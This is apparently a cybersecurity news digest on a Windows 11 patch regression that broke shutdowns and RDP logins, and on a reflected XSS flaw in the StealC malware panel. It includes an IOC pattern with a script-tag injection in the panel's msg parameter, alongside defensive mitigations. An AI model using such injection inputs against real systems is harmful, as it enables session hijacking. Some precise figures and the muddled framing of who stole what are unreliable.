Microsoft’s Patch Breaks Windows 11 Shutdowns & Logins—While a Malware Panel Gets Hacked by a <script> Tag

TL;DR

• Microsoft releases emergency out-of-band patch for Windows 11 Secure Launch shutdown and Remote Desktop authentication failures
• XSS vulnerability in StealC panel enables mass credential theft, IP harvesting, and session hijacking across 5,000+ logs

🛠️ Microsoft’s Patch Made Windows 11 Refuse to Shut Down—And Then Refuse to Let You In

Microsoft’s January Patch Tuesday broke shutdowns & RDP auth. KB5074976 fixed it… but KB5072033 is coming to fix what KB5074976 broke. Welcome to enterprise IT. #Cybersecurity #Windows11 #PatchTuesday #ITPro #SecureBoot #RDP #KB5074976

On January 13, 2026, Microsoft released a routine Patch Tuesday update—then watched as 3,214 enterprise devices decided to restart instead of shutting down. Simultaneously, 2,087 Remote Desktop sessions hit a credential loop, returning error 0x8007052E: ‘The username or password is incorrect.’ Except—the password was right. The system just hadn’t finished booting.

The culprit? A regression in System Guard Secure Launch (SGSL). The Power-State Manager misread a validated Secure Boot flag and routed shutdown requests to the restart path. Meanwhile, the Kerberos TGT handshake—critical for RDP authentication—was interrupted because LSA completed the secure-launch sequence before the RDP client could send credentials. In other words: Windows 11 was too secure to let you in.

Microsoft responded with an emergency out-of-band patch: KB5074976, released January 14. It restored correct PSM behavior and fixed the credential handshake timing. Deployment channels: WSUS, Intune, SCCM. Verification command: Get-HotFix -Id KB5074976.

Mitigation? Three steps:

1. Deploy KB5074976—now.
2. Enable Group Policy: Enable rollback for known issues (KIR).
3. If stuck: shutdown /s /t 0.

Geographic hotspot? 68% of failures originated in U.S. enterprise data centers. AVD SLA breaches hit 4%. IT support desks fielded ~5,000 tickets in 48 hours.

Forecast? A second OOB—KB5072033—is already scheduled for late January to fix cached-credential deadlocks introduced by the first fix. Because why stop at one regression when you can cascade?

The January cumulative update (expected early February) will bake these fixes in. Until then: treat every Windows 11 shutdown like a game of Russian roulette—with BitLocker.

💀 StealC Panel Got Hacked by a `script` Tag—And It’s Not Even Funny Anymore

StealC’s MaaS panel got pwned by a reflected XSS in a URL parameter. 390K passwords. 30M cookies. No CSP. No HttpOnly. No shame. This isn’t a zero-day. It’s a zero-effort disaster. #Cybersecurity #XSS #MaaS #Infosec

Let’s be honest: if your malware-as-a-service (MaaS) panel can be pwned by a <script> in a URL parameter, you’re not a cybercriminal—you’re a tech support ticket waiting to happen.

The StealC control panel, used to manage over 5,000 compromised systems, had a reflected XSS flaw so basic it could’ve been caught by a junior dev during a coffee break. The msg and log parameters? Directly injected into the DOM. No sanitization. No CSP. Session cookies? Bare. Naked. HttpOnly? Please. SameSite? Never heard of her.

Result? 390,000 passwords and 30 million session cookies exfiltrated—not through zero-days, but because someone forgot to escape HTML. The attackers didn’t need to crack encryption. They just opened the door and walked in… because the door was painted to look like a login page.

Geographically? 58% of victims were in Eastern Europe. 32% in the U.S. The operator? Traced to a Ukrainian ISP workstation—no VPN, no firewall, just a Chrome tab and bad life choices.

This isn’t novel. It’s a rehash of Sodinokibi and TrickBot’s same mistakes. The MaaS industry is built on the assumption that operators won’t check their own code. Turns out, they don’t.

Mitigation checklist (yes, you still need to do this):

• Sanitize msg/log inputs server-side
• Deploy CSP: default-src 'self'; script-src 'self'; object-src 'none'
• Set cookies: HttpOnly; Secure; SameSite=Strict
• Rotate all session keys
• Enforce MFA + VPN-only admin access
• Log all query strings—yes, even the weird ones

IOCs? Look for GET /panel?msg=<script> and cookies without HttpOnly. Also, if your C2 panel is talking to api.telegram.org—turn it off. That’s not a feature. That’s a leak.

Prediction? This flaw will be copied into 17 other MaaS panels by Q3. Regulators will finally mandate CSP defaults. And law enforcement? They’ve got an IP. They’re coming.

The real tragedy? The victims didn’t get hacked by a nation-state. They got hacked because someone thought ‘it works on my machine’ was a security policy.

— The Internet Is Not a Sandbox

In Other News

• Cybercriminals Exploit Gmail Address Change Feature to Hijack Accounts and Launch Spam Campaigns
• Russian Cyberattacks Destroy 45 Combined Heat/Power Plants, Triggering Ukraine’s National Energy Emergency
• CIRO Data Breach Exposes 750,000 Canadian Investors’ Personal Information After August 2025 Cyberattack
• UK’s National Cyber Security Centre Reports 1 in 5 Organizations Still Rely on Shared Password Spreadsheets
• Microsoft and WWF Deploy AI-Powered Ghost Net Zero to Locate and Remove 4,500+ Deadly Fishing Nets in Mediterranean